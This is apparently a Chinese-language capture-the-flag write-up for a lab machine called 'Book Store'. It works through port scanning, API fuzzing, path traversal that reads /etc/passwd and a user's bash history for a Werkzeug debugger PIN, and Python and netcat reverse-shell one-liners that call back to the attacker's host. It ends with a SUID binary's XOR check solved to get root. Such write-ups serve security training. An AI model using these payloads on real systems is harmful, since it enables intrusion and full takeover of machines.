端口扫描

nmap --min-rate=10000 -p- 10.10.77.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTC
Nmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)
Host is up (0.0043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 02:BB:D6:ED:30:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds

nmap -sT -sV -sC -O -p22,80,5000 10.10.77.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTC
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 05:43 (0:00:12 remaining)
Nmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)
Host is up (0.00050s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 440e60ab1e865b442851db3f9b122177 (RSA)
|   256 592f70769f65abdc0c7dc1a2a34de640 (ECDSA)
|_  256 109f0bddd64dc77a3dff52421d296eba (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry 
|_/api </p> 
|_http-title: Home
MAC Address: 02:BB:D6:ED:30:03 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

Web

发现是80和5000都开了web服务，但是5000是由python写的

稍微扫一下目录，80的目录没什么特别的，就一个主页面加登录页面，5000端口有一个api，列出了许多api端口和console管理界面，但是需要pin码

看一下80端口，登陆界面似乎是是用不了的，也注册不了账户。但是在网站源码中发现:

Still Working on this page will add the backend support soon, also the debugger pin is inside sid’s bash history file

似乎可以获得console界面的pin码，在bash的历史记录文件中，也就是.bash_history?

5000端口的api界面倒是列出了非常多的api，但是都是v2的？也许我们可以尝试一下v1

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://10.10.77.138:5000/api/v1/resources/books?FUZZ=1'

发现存在一个show api，访问一下，发现报错了，提示没有这个文件。也许存在文件包含

http://10.10.77.138:5000/api/v1/resources/books?show=../../../../../../etc/passwd

还真有，并且发现有一个叫做sid的用户，查看他的bash记录

http://10.10.77.138:5000/api/v1/resources/books?show=../../../../../../home/sid/.bash_history

找到pin码:123-321-135

Getshell

得到一个pythonshell，直接反弹shell

import sys, socket, os, pty; s = socket.socket(); s.connect(('10.11.38.245', 80)); [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]; pty.spawn("/bin/sh")

发现运行之后连接被停止了？？也许不能使用python来调用socket?

试试用系统命令

试了几个bash反弹shell算是成功了

import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.38.245 443 >/tmp/f')

提权

家目录有一个suid程序，让我们输入一个magic number

直接把这个程序下载下来放ida反编译

在main函数找到这么一段代码:

v6 = 23987;
puts("What's The Magic Number?!");
__isoc99_scanf("%d", &v5);
v7 = v6 ^ v5 ^ 0x1116;
if ( v7 == 1573724660 )
  system("/bin/bash -p");
else
  puts("Incorrect Try Harder");

我们只需要解:v6 ^ v5 ^ 0x1116 = 1573724660

求出v5就好

v6v5=1573724660^0x1116
v5=23987^v6v5
print(v5)

得到:1573743953

运行程序然后输入，我们是root!

碎碎念

还是挺简单的一个靶机，基本上没有什么坑绕来绕去的。